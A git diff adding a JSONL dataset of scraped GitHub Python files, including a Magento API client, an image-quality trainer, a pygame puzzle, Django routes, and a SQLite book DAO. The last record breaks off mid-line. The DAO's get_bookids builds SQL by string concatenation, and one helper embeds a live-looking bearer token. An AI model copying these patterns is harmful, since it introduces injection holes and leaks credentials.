diff --git "a/4651.jsonl" "b/4651.jsonl" new file mode 100644--- /dev/null +++ "b/4651.jsonl" @@ -0,0 +1,615 @@ +{"seq_id":"41680908323","text":"import logging\nimport requests\n\nimport ma.utility\nimport ma.exceptions\nimport ma.api.base_class\nimport ma.config.maintenance\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass MaintenanceApi(ma.api.base_class.Api):\n def __init__(self):\n self.__mst = ma.config.maintenance.MAGENTO_SECURITY_TOKEN\n if self.__mst is None:\n raise ma.exceptions.MissingSecurityTokenError(\"Maintenance\")\n\n self.__mmu = ma.config.maintenance.MAGENTO_MAINTENANCE_URL\n self.__mct = ma.config.maintenance.MAGENTO_CACHE_TYPES\n self.__mit = ma.config.maintenance.MAGENTO_INDEX_TYPES\n\n def __get_matching_entries(self, d, l):\n \"\"\" Returns all the dictionary entries as a tuple\n based on the matching keys from the passed list\n \"\"\"\n\n # defaults to all entries when nothing to match.\n # Used as flag to process the entire set.\n if l is None:\n return d.items()\n\n return ma.utility.match_dict_keys_from_list(d, l)\n\n def refresh_cache(self, cache_types=None):\n entries = self.__get_matching_entries(\n self.__mct,\n cache_types)\n\n for (k, desc) in entries:\n url = self.__mmu['cache'].format(k, self.__mst)\n r = requests.get(url)\n\n if r.status_code == requests.codes.ok:\n _LOGGER.info(\"Cache Refresh [%s]: %s\", k, desc)\n else:\n _LOGGER.warning(\"Unable to refresh cache: [%s]\", k)\n\n def reindex(self, index_types=None):\n entries = self.__get_matching_entries(\n self.__mit,\n index_types)\n\n for (k, desc) in entries:\n url = self.__mmu['index'].format(k, self.__mst)\n r = requests.get(url)\n\n if r.status_code == requests.codes.ok:\n _LOGGER.info(\"Re-index [%s]: %s\", k, desc)\n else:\n _LOGGER.warning(\"Unable to reindex: [%s]\", desc)\n","repo_name":"CoffeeForThinkers/MagentoAPI","sub_path":"ma/api/custom/maintenance.py","file_name":"maintenance.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"584543536","text":"import argparse\nimport math\nimport numpy as np\nimport yaml\nfrom pathlib import Path\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom model import DIQANet\nfrom loader import DataInfoLoader, DIQADataset\n# pytorch ignite engine\nfrom ignite.engine import create_supervised_trainer, create_supervised_evaluator, Events\nfrom ignite.metrics.metric import Metric\nfrom sklearn.metrics import mean_squared_error\n\n\ndef ensure_dir(path):\n p = Path(path)\n if not p.exists():\n p.mkdir()\n\n\ndef loss_fn(y_pred, y):\n return F.l1_loss(y_pred, y)\n\n\ndef get_data_loaders(dataset_name, config, train_batch_size):\n data_info = DataInfoLoader(dataset_name, config)\n img_num = data_info.img_num\n index = np.arange(img_num)\n np.random.shuffle(index)\n\n # train, val, test\n train_index = index[0:math.floor(img_num*0.7)]\n val_index = index[math.floor(img_num*0.7): math.floor(img_num*0.9)]\n test_index = index[math.floor(img_num*0.9):]\n\n train_dataset = DIQADataset(dataset_name, config, train_index, status='train')\n train_loader = DataLoader(train_dataset, batch_size=train_batch_size,\n shuffle=True, num_workers=4)\n\n val_dataset = DIQADataset(dataset_name, config, val_index, status='val')\n val_loader = DataLoader(val_dataset)\n\n if config['test_ratio']:\n test_dataset = DIQADataset(dataset_name, config, test_index, status='test')\n test_loader = DataLoader(test_dataset)\n return train_loader, val_loader, test_loader\n return train_loader, val_loader\n\n\nclass DIQA_Performance(Metric):\n def reset(self):\n self.label_pred = []\n self.label = []\n\n def update(self, output):\n y_pred, y = output\n self.label_pred.append(torch.mean(y_pred))\n self.label.append(y)\n\n def compute(self):\n y_pred = np.reshape(np.asarray(self.label_pred), (-1,))\n y = np.reshape(np.asarray(self.label), (-1,))\n # y_pred = np.array(self.label_pred)\n # y = np.array(self.label)\n # rmse = np.sqrt(((y_pred - y) ** 2).mean(axis=None))\n rmse = mean_squared_error(y, y_pred, squared=False)\n return rmse\n\n\nclass Solver:\n def __init__(self):\n self.model = DIQANet()\n\n def run(self, dataset_name, train_batch_size, epochs, lr, weight_decay, config, trained_model_file):\n if config['test_ratio']:\n train_loader, val_loader, test_loader = get_data_loaders(dataset_name, config, train_batch_size)\n else:\n train_loader, val_loader = get_data_loaders(dataset_name, config, train_batch_size)\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.model = self.model.to(device)\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr, weight_decay=weight_decay)\n global best_criterion\n best_criterion = -1\n trainer = create_supervised_trainer(self.model, optimizer, loss_fn, device=device)\n evaluator = create_supervised_evaluator(self.model, metrics={'performance': DIQA_Performance()}, device=device)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_result(engine):\n evaluator.run(val_loader)\n metrics = evaluator.state.metrics\n rmse = metrics['performance']\n print('Validation result: -Epoch: {} RMSE: {:.4f}'.format(engine.state.epoch, rmse))\n global best_criterion\n global best_epoch\n # if rmse > best_criterion:\n # best_criterion = rmse\n best_epoch = engine.state.epoch\n print('epoch:', best_epoch)\n torch.save(self.model.state_dict(), trained_model_file)\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_testing_result(engine):\n if config['test_ratio'] > 0 and config['test_during_training']:\n evaluator.run(test_loader)\n metrics = evaluator.state.metrics\n rmse = metrics['performance']\n print('Test result: -Epoch: {} RMSE: {:.4f}'.format(engine.state.epoch, rmse))\n\n @trainer.on(Events.EPOCH_COMPLETED)\n def final_testing_result(engine):\n if config['test_ratio'] > 0:\n self.model.load_state_dict(torch.load(trained_model_file))\n evaluator.run(test_loader)\n metrics = evaluator.state.metrics\n rmse = metrics['performance']\n global best_epoch\n print('Final test result - Epoch: {} RMSE: {:.4f}'.format(best_epoch, rmse))\n trainer.run(train_loader, max_epochs=epochs)\n\n\nif __name__ == '__main__':\n import os\n parser = argparse.ArgumentParser(description='Pytorch DIQA model')\n parser.add_argument('--batch_size', type=int, default=32, help='batch size training')\n parser.add_argument('--epochs', type=int, default=100, help='epoch training')\n parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')\n parser.add_argument('--decay', type=float, default=0.0, help='weight decay')\n parser.add_argument('--opt', type=str, default='Adam', help='optimizer')\n parser.add_argument('--config', type=str, default='config.yaml', help='config file')\n parser.add_argument('--ds_name', type=str, default='bill', help='name of dataset')\n parser.add_argument('--pretrained', type=str, default='../weights/', help='load pretrained model')\n parser.add_argument('--saved', type=str, default='saved/', help='path to save model')\n args = parser.parse_args()\n with open(args.config) as f:\n config = yaml.load(f)\n ensure_dir(args.pretrained)\n ensure_dir(args.saved)\n trained_model_file = os.path.join(args.pretrained, 'DIQA-{}-lr={}.pth'.format(args.ds_name, args.lr))\n dataset_name = 'bill'\n solver = Solver()\n solver.run(dataset_name, args.batch_size, args.epochs, args.lr, args.decay, config,\n trained_model_file)\n \"\"\"\n python train_recognition.py --batch_size 32 --epochs 100\n \"\"\"","repo_name":"cuongngm/IQA_IE_receipt","sub_path":"task1_diqa/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"3333581042","text":"import time\nimport board\nimport busio\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.consumer_control import ConsumerControl\nfrom ch559 import Ch559\n\n# NOTE - make sure these pins are up-to-date for your setup!\nuart = busio.UART(board.D6, board.D7, baudrate=400000)\n\ntime.sleep(1) # Sleep for a bit to avoid a race condition on some systems\n\n# we're just going to forward on keyboard events - a clean passthrough\nkeyboard = Keyboard(usb_hid.devices)\nconsumer_ctrl = ConsumerControl(usb_hid.devices)\n\nch559 = Ch559(uart)\n\nwhile True:\n event = ch559.poll()\n if event is not None:\n new_keys = event.get(\"keys_added\")\n if new_keys is not None:\n for k in new_keys:\n keyboard.press(k)\n old_keys = event.get(\"keys_removed\")\n if old_keys is not None:\n for rk in old_keys:\n keyboard.release(rk)\n cc = event.get(\"consumer_ctrl_clicked\")\n if cc is not None:\n consumer_ctrl.send(cc)","repo_name":"dupontgu/ch559-circuitpython","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"1335204113","text":"from abc import ABC, abstractmethod\n\nfrom aiogram import Router, Bot\nfrom aiogram.types import InlineKeyboardMarkup, Message\n\n\nclass BaseRouter(ABC):\n router: Router = None\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.router = Router()\n\n @abstractmethod\n def get_router(self) -> Router:\n pass\n\n async def send_message(\n self,\n message: str,\n chat_id: int,\n reply_id: int = None,\n silent: bool = True,\n photo_url: str = None,\n show_typing: bool = False,\n buttons: InlineKeyboardMarkup = None\n ) -> Message:\n if show_typing:\n await self.bot.send_chat_action(chat_id, 'typing')\n\n if photo_url is not None:\n return await self.bot.send_photo(\n chat_id,\n photo_url,\n caption=message,\n reply_to_message_id=reply_id,\n disable_notification=silent,\n reply_markup=buttons\n )\n\n return await self.bot.send_message(\n chat_id,\n message,\n reply_to_message_id=reply_id,\n disable_notification=silent,\n reply_markup=buttons\n )\n","repo_name":"pkarpovich/little-turtle","sub_path":"little_turtle/handlers/routers/base_router.py","file_name":"base_router.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16277430642","text":"\"\"\"tp URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\n\nfrom ctfm.views import auth, login, index, dashboard, testing, \\\n get_process, get_schedule, get_utilization, get_results, \\\n get_reservations, reserve, task_exec, exec_status, notification\n\nurlpatterns = [\n url(r'^index/$', index),\n url(r'^index/dashboard.html/$', dashboard),\n url(r'^index/testing.html/$', testing),\n url(r'^login/$', login),\n url(r'^process/$', get_process),\n url(r'^schedule/$', get_schedule),\n url(r'^utilization/$', get_utilization),\n url(r'^result/$', get_results),\n url(r'^auth/$', auth),\n url(r'^notification/$', notification),\n url(r'^reserve/$', reserve),\n url(r'^reserved/$', get_reservations),\n url(r'^taskExec/$', task_exec),\n url(r'^execStatus/$', exec_status)\n]\n\n","repo_name":"gallopor/fhcts","sub_path":"ctfm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26197496829","text":"from tkinter.tix import WINDOW\nfrom turtle import Screen, window_width\nimport pygame\nimport random\n\npygame.init()\n\nWINDOW_WIDTH = 800\nWINDOW_HEIGHT = 600\nScreen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\npygame.display.set_caption('ImagePuzzle Game')\n\nFPS = 10\nclock = pygame.time.Clock()\n\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nORANGE = (255, 127, 0)\nCRIMSON = (220, 20, 60)\n\n\nimg = random.randint(0, 2)\n\nif(img == 0):\n img = 'elephant.jpg'\nelif(img == 1):\n img = 'image3.jpg'\nelse:\n img = 'IITM.jpg'\n\nbg = pygame.image.load(img)\nbg_rect = bg.get_rect()\nbg_rect.topleft = (0, 0)\n\nbk = pygame.image.load('background.jpg')\n\nfont_title = pygame.font.SysFont(None, 64)\nfont_content = pygame.font.Font(None, 40)\nfont_img = pygame.font.Font(None, 20)\n\ntitle_text = font_title.render('Puzzle Game', True, BLACK)\ntitle_rect = title_text.get_rect()\ntitle_rect.center = (WINDOW_WIDTH // 2, WINDOW_HEIGHT // 2 - 100)\n\nchoose_text = font_content.render('Choose Your Level', True, BLACK)\nchoose_rect = choose_text.get_rect()\nchoose_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 - 20)\n\neasy_text = font_content.render('Press E for Easy', True, BLACK)\neasy_rect = easy_text.get_rect()\neasy_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 40)\n\nmedium_text = font_content.render('Press M for Medium', True, BLACK)\nmedium_rect = medium_text.get_rect()\nmedium_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 90)\n\nhard_text = font_content.render('Press H for Hard', True, BLACK)\nhard_rect = hard_text.get_rect()\nhard_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 140)\n\nimg_text = font_img.render('Hold Tab For Original Image', True, BLACK)\nimg_rect = img_text.get_rect()\nimg_rect.center = (WINDOW_WIDTH - 100, WINDOW_HEIGHT - 20)\n\n\nplay_again_text = font_title.render('play Again?', True, WHITE)\nplay_again_rect = play_again_text.get_rect()\nplay_again_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2)\n\ncontinue_text = font_content.render('press Space', True, WHITE)\ncontinue_rect = continue_text.get_rect()\ncontinue_rect.center = (WINDOW_WIDTH//2, WINDOW_HEIGHT // 2 + 50)\n\n\nselected_img = None\nis_game_over = False\nshow_start_screen = True\n\nrows = None\ncols = None\n\ncell_width = None\ncell_height = None\n\ncells = []\n\n\ndef start_game(mode):\n global cells, cell_width, cell_height, show_start_screen\n\n rows = mode\n cols = mode\n num_cells = rows * cols\n cell_width = WINDOW_WIDTH // rows\n cell_height = WINDOW_HEIGHT // cols\n\n cell = []\n rand_indexes = list(range(0, num_cells))\n\n for i in range(num_cells):\n x = (i % rows) * cell_width\n y = (i // cols) * cell_height\n rect = pygame.Rect(x, y, cell_width, cell_height)\n rand_pos = random.choice(rand_indexes)\n rand_indexes.remove(rand_pos)\n cells.append({'rect': rect, 'border': WHITE,\n 'order': i, 'pos': rand_pos})\n\n show_start_screen = False\n\n\nrunning = True\nwhile running:\n\n Screen.blit(bk,(0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n if event.key == pygame.K_TAB:\n Screen.blit(bg, bg_rect)\n\n if is_game_over:\n keys = pygame.key.get_pressed()\n if keys[pygame.K_SPACE]:\n is_game_over = False\n show_start_screen = True\n\n if show_start_screen:\n keys = pygame.key.get_pressed()\n if keys[pygame.K_e]:\n start_game(3)\n if keys[pygame.K_m]:\n start_game(4)\n if keys[pygame.K_h]:\n start_game(5)\n\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and not is_game_over:\n mouse_pos = pygame.mouse.get_pos()\n\n for cell in cells:\n rect = cell['rect']\n order = cell['order']\n\n if rect.collidepoint(mouse_pos):\n if not selected_img:\n selected_img = cell\n cell['border'] = RED\n else:\n current_img = cell\n if current_img['order'] != selected_img['order']:\n temp = selected_img['pos']\n cells[selected_img['order']\n ]['pos'] = cells[current_img['order']]['pos']\n cells[current_img['order']]['pos'] = temp\n\n cells[selected_img['order']]['border'] = WHITE\n selected_img = None\n\n is_game_over = True\n for cell in cells:\n if cell['order'] != cell['pos']:\n is_game_over = False\n\n if show_start_screen:\n\n Screen.fill(WHITE)\n Screen.blit(bk,(0,0))\n Screen.blit(title_text, title_rect)\n Screen.blit(choose_text, choose_rect)\n Screen.blit(easy_text, easy_rect)\n Screen.blit(medium_text, medium_rect)\n Screen.blit(hard_text, hard_rect)\n\n else:\n\n Screen.fill(WHITE)\n\n if not is_game_over:\n for i, val in enumerate(cells):\n pos = cells[i]['pos']\n img_area = pygame.Rect(\n cells[pos]['rect'].x, cells[pos]['rect'].y, cell_width, cell_height)\n Screen.blit(bg, cells[i]['rect'], img_area)\n pygame.draw.rect(\n Screen, cells[i]['border'], cells[i]['rect'], 1)\n Screen.blit(img_text, img_rect)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n Screen.blit(bg, bg_rect)\n\n else:\n Screen.blit(bg, bg_rect)\n Screen.blit(play_again_text, play_again_rect)\n Screen.blit(continue_text, continue_rect)\n\n pygame.display.update()\n clock.tick(FPS)\npygame.quit()\n","repo_name":"apoorvsingh2314/ImagePuzzle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71152900303","text":"\"\"\"\n\nBookDao class - CRUD operations for the Book resource thru REST\n\n\"\"\"\n\n\nfrom database.db import get_db\n\n\ndef insert_book(title, author, isbn, dop):\n db = get_db()\n cursor = db.cursor()\n statement = \"INSERT INTO books(title, author, isbn, dateOfPublication) VALUES (?, ?, ?, ?)\"\n cursor.execute(statement, [title, author, isbn, dop])\n db.commit()\n return True\n\n\ndef update_book(id, title, author, isbn, dop):\n db = get_db()\n cursor = db.cursor()\n statement = \"UPDATE books SET title=?, author=?, isbn=?, dateOfPublication =? WHERE id= ?\"\n cursor.execute(statement, [title, author, isbn, dop, id])\n db.commit()\n return True\n\n\ndef delete_book(bookid):\n db = get_db()\n cursor = db.cursor()\n statement = \"DELETE FROM books WHERE id = ?\"\n cursor.execute(statement, [bookid])\n db.commit()\n return True\n\n\ndef get_by_id(bookid):\n db = get_db()\n cursor = db.cursor()\n statement = \"SELECT id, title, author, isbn, dateOfPublication FROM books WHERE id = ?\"\n cursor.execute(statement, [bookid])\n desc = cursor.description\n column_names = [col[0] for col in desc]\n data = [dict(zip(column_names, row))\n for row in cursor.fetchall()]\n return data\n\n\ndef get_books():\n db = get_db()\n cursor = db.cursor()\n query = \"SELECT id, title, author, isbn, dateOfPublication FROM books\"\n cursor.execute(query)\n desc = cursor.description\n column_names = [col[0] for col in desc]\n data = [dict(zip(column_names, row))\n for row in cursor.fetchall()]\n return data\n\n\ndef get_bookids(ids):\n db = get_db()\n cursor = db.cursor()\n statement = \"SELECT id, title, author, isbn, dateOfPublication FROM books WHERE id IN (\"+str(ids)+\")\"\n cursor.execute(statement)\n desc = cursor.description\n column_names = [col[0] for col in desc]\n data = [dict(zip(column_names, row))\n for row in cursor.fetchall()]\n return data\n\n\ndef get_bookid(title):\n db = get_db()\n cursor = db.cursor()\n statement = \"SELECT id FROM books WHERE title = ?\"\n cursor.execute(statement, [title])\n return cursor.fetchone()\n","repo_name":"codehawkzz/BookWishList","sub_path":"src/book/dao/BookDao.py","file_name":"BookDao.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22631162143","text":"from setuptools import setup, find_packages\nfrom os import path\nfrom io import open\n\n\ndef get_about():\n scope = {}\n with open(\"nautapy/__about__.py\") as fp:\n exec(fp.read(), scope)\n return scope\n\n\ndef get_requirements(env=\"base.txt\"):\n with open(\"requirements/{}\".format(env)) as fd:\n requirements = []\n for line in fd.readlines():\n if line.startswith(\"-r\"):\n _, _env = line.split(\" \", 2)\n requirements += get_requirements(_env.strip())\n else:\n requirements.append(line.strip())\n return requirements\n\n\ndef get_readme():\n \"\"\"\n Get the long description from the README file\n :return:\n \"\"\"\n with open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n return f.read()\n\n\nhere = path.abspath(path.dirname(__file__))\nabout = get_about()\n\nsetup(\n name=about[\"__name__\"],\n version=about[\"__version__\"],\n description=about[\"__description__\"],\n long_description=get_readme(),\n long_description_content_type=\"text/markdown\",\n url=about[\"__url__\"],\n author=about[\"__author__\"],\n author_email=about[\"__email__\"],\n classifiers=[\n \"Topic :: Internet\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\"\n ],\n keywords=\"nauta portal cautivo\",\n packages=find_packages(),\n install_requires=get_requirements(),\n entry_points={\n \"console_scripts\": [about[\"__cli__\"] + \"=nautapy.cli:main\"],\n },\n scripts=[\n 'bin/run-connected',\n ]\n)\n","repo_name":"atscub/nautapy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"47"} +{"seq_id":"35745907443","text":"import os\nimport csv\nimport shutil\n\ndef get_images_in_path(rel_path):\n path = os.path.abspath(rel_path)\n files = filter(\n lambda x: os.path.isfile(os.path.join(path, x)),\n os.listdir(path)\n )\n return files\n\nfor filedir in [\"./train/\", \"./test/\"]:\n files = get_images_in_path(filedir)\n with open(os.path.join(filedir, 'labels.txt'), 'wb') as labels_file:\n labels = csv.writer(labels_file, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n for f in files:\n label = 1 if f.split(\"_\")[0] == \"dog\" else 0\n labels.writerow([f, label])\n","repo_name":"kraftp/CS-281-final","sub_path":"data/flickr/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26205943497","text":"import requests\n\n# FORMA DE CONSUMIR UNA BASE DE DATOS DE OTRA BASE DE DATOS\n\ndef consultarDNI(dni):\n base_url = \"https://apiperu.dev/api/\"\n solicitud = requests.get(url=base_url+\"dni/\"+dni, headers={\n \"Content-Type\": \"aplication/json\",\n \"Authorization\": \"Bearer 8389c125f5c44cd4791786ff111992abd840f1128ce626db5a67e18af56a18bb\"\n })\n print(solicitud.status_code)\n print(solicitud.json())\n return solicitud.json()","repo_name":"Jesuscueva/Repo_Backend","sub_path":"Semana_8/veterianria/administracion/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35118147603","text":"N = int(input())\nanswer = 0\nfor t in range(N):\n word = input()\n alpha = dict()\n for i in range(len(word)):\n ascii = ord(word[i]) - 97\n if ascii not in alpha:\n alpha[ascii] = [i]\n else:\n alpha[ascii] += [i]\n\n check = True\n for key, value in alpha.items():\n if len(value) > 1:\n for i in range(len(value) - 1):\n if value[i + 1] - value[i] > 1:\n check = False\n break\n if check:\n answer += 1\n\nprint(answer)\n","repo_name":"Gyusik-Choi/algorithm","sub_path":"baekjoon/1316_그룹 단어 체커/B_1316.py","file_name":"B_1316.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40250675525","text":"# https://www.sololearn.com/learning/1073/2467/5125/1\n\n# Class is a blueprint for similar objects\n# Methods are function ties/ called form an object\n# Every instance in python (int, float, string, list, etc) is an object\n\nclass Number:\n def sum(self):\n return self.a + self.b\n\n\nsumObject1 = Number()\nsumObject1.a = 10\nsumObject1.b = 20\n\ns = sumObject1.sum()\nprint(sumObject1.a)\nprint(sumObject1.b)\nprint(s)\nprint()\n\n\n# Some object of same classes in python may have attributes that\n# other objects (of same class) doesn't have (Eg here below)\n# Such attributes need to be defines externally in the program (not inside the Class)\n# But this work may become tedious for every instance for that class (use constructors)\nsumObject2 = Number()\n# print(sumObject2.a) # error\n# print(sumObject2.b) # error\n\n\n'''\nPascalCase \nEmployeeName -->PascalCase \n\ncamelCase\nisNumeric, isFloatOrInt -->camelCase\n'''\n","repo_name":"devKhush/Python","sub_path":"10-OOPs/01_oops.py","file_name":"01_oops.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29008393566","text":"from shared.src import cybered\n\n\nclass HashingModule(cybered.LessonModule):\n \"\"\"The cybered module configuration for the hashing module.\"\"\"\n\n # The name of this app.\n name = \"hashing\"\n\n module_name = \"Hashing and Message Digests\"\n module_base_link = \"hashing/\"\n module_start_link = \"begin/\"\n\n module_description = (\n \"An introduction to message digests and their uses in message authentication and integrity\"\n )\n\n\nclass HashingPageManager(cybered.PageManager):\n page_list = (\n (\"begin\", HashingModule.module_start_link, \"hashing/begin.html\"),\n (\"motivation\", \"motivation/\", \"hashing/motivation.html\"),\n (\"examples_form\", \"examples-input/\", \"hashing/examples_form.html\"),\n (\"examples_results\", \"examples-results/\", \"hashing/examples_results.html\"),\n (\"keyed_examples_form\", \"keyed-examples-input/\", \"hashing/keyed_hashes_form.html\"),\n (\"keyed_examples_results\", \"keyed-examples-results\", \"hashing/keyed_hashes_results.html\"),\n (\"conclusions\", \"conclusions/\", \"hashing/conclusion.html\"),\n (\"tools\", \"tools/\", \"hashing/tools.html\"),\n )\n","repo_name":"Notgnoshi/cybersec-project","sub_path":"cybered/hashing/src/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6621196822","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport openai\nimport logging\nfrom rich.markdown import Markdown\nfrom rich import print as rprint\nfrom halo import Halo\n\n# Setup logging based on environment variable\nlog_level = os.environ.get(\"LOG_LEVEL\", \"WARNING\").upper()\nlogging.basicConfig(level=getattr(logging, log_level))\n\n# Read OpenAI API key from environment variable\napi_key = os.environ.get(\"OPENAI_API_KEY\")\nif not api_key:\n logging.error(\"OPENAI_API_KEY environment variable not set.\")\n exit(1)\n\nopenai.api_key = api_key\n\n# App version\nAPP_VERSION = \"0.7.0\"\n\ndef call_openai_api(question):\n try:\n LATEST_STABLE_MODEL = \"gpt-4\"\n MODEL = \"gpt-4-1106-preview\"\n messages = [{\"role\": \"user\", \"content\": question}]\n \n # Make API call\n with Halo(text='Waiting for response...', spinner='dots'):\n response = openai.ChatCompletion.create(\n model=MODEL,\n messages=messages,\n temperature=0,\n )\n return response['choices'][0]['message']['content']\n except Exception as e:\n logging.error(f\"API call failed: {e}\")\n return None\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n logging.error(\"No query string provided.\")\n exit(1)\n\n # Get user input from command line argument\n arg = sys.argv[1]\n\n if arg == \"--version\":\n print(f\"App version: {APP_VERSION}\")\n exit(0)\n else:\n logging.info(f\"Received input: {arg}\")\n\n # Call OpenAI API\n response = call_openai_api(arg)\n\n # Output response or failure message\n if response:\n markdown_response = Markdown(response)\n rprint(\"Assistant says:\", markdown_response)\n else:\n print(\"Failed to get a response.\")\n\n","repo_name":"cdemers/question","sub_path":"question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34272691215","text":"import cv2\nimport pyk4a\nimport threading\nfrom time import time\nimport tkinter as tki\nfrom PIL import Image,ImageTk\nfrom playsound import playsound\nfrom pyk4a import PyK4ARecord,ImageFormat\nfrom common.helpers import convert_to_bgra_if_required,colorize\n\nclass AzureRecorder():\n\t\n\tdef __init__(self,capture,config,output,color,count):\n\t\t\n\t\tself.flag_record = False\n\t\t# ========================================================================================================\n\t\tself.cap = capture\n\t\tself.config = config\n\t\tself.color = color\n\t\tself.count = count\n\t\tself.outpath = output\n\t\tself.record = None\n\t\tself.rgb = None\n\t\tself.depth = None\n\t\tself.frame = None\n\t\tself.thread = None\n\t\tself.stop_event = None\n\t\tself.start = None\n\t\tself.root = tki.Tk()\n\t\tself.rgb_panel = None\n\t\tself.depth_panel = None\n\n\t\tbtn = tki.Button(self.root, text=\"Start recording\",command=self.start_callback)\n\t\tbtn.pack(side=\"bottom\",fill=\"both\",expand=\"yes\",padx=10,pady=10)\n\n\t\tstop_btn = tki.Button(self.root, text=\"Stop recording\",command=self.stop_callback)\n\t\tstop_btn.pack(side=\"bottom\",fill=\"both\",expand=\"yes\",padx=10,pady=10)\n\t\t# ========================================================================================================\n\t\t\n\t\tself.stop_event = threading.Event()\n\t\tself.thread = threading.Thread(target=self.run,args=())\n\t\tself.thread.start()\n\t\t\n\t\tself.root.wm_title(\"Azure Kinect Recorder\")\n\t\tself.root.wm_protocol(\"WM_DELETE_WINDOW\",self.on_close)\n\t\t\n\t\tif not pyk4a.connected_device_count():\n\t\t\traise RuntimeError('Failed to connect to sensor')\n\t\n\tdef start_callback(self):\n\t\tprint(\"Started recording\")\n\t\ttry:\n\t\t\tplaysound(\"Processor/common/audio/start.mp3\")\n\t\t\tself.record = PyK4ARecord(device=self.cap, config=self.config, path=(self.outpath+ f\"/{self.color}_{self.count}.mkv\"))\n\t\t\tself.flag_record = True\n\t\t\tself.record.create()\n\t\t\tself.start = time()\n\n\t\texcept (RuntimeError, TypeError, NameError) as e:\n\t\t\tprint(\"Can't start recording! :\",e)\n\t\n\tdef stop_callback(self):\n\t\tplaysound(\"Processor/common/audio/stop.mp3\")\n\t\tprint(\"stop recording\")\n\t\tself.flag_record = False\n\t\tself.record.flush()\n\t\tself.record.close()\n\t\tprint(f\"{self.record.captures_count} frames written.\")\n\t\tself.count += 1\n\t\n\tdef run(self):\n\t\ttry:\n\t\t\twhile not self.stop_event.is_set():\n\t\t\t\tself.frame = self.cap.get_capture()\n\t\t\t\tself.rgb = convert_to_bgra_if_required(ImageFormat.COLOR_MJPG,self.frame.color)[:,:,:3]\n\t\t\t\tself.depth = self.frame.transformed_depth\n\n\t\t\t\t#===================================================================================\n\t\t\t\t#\t\t\t\t\t\tNot so elegant way to do this! \t\t\t\t\t\t\t #\n\t\t\t\t#===================================================================================\n\t\t\t\trgb_image = cv2.cvtColor(self.rgb, cv2.COLOR_BGR2RGB)\n\t\t\t\trgb_image = Image.fromarray(rgb_image)\n\t\t\t\trgb_image = ImageTk.PhotoImage(rgb_image)\n\n\t\t\t\tdepth_image 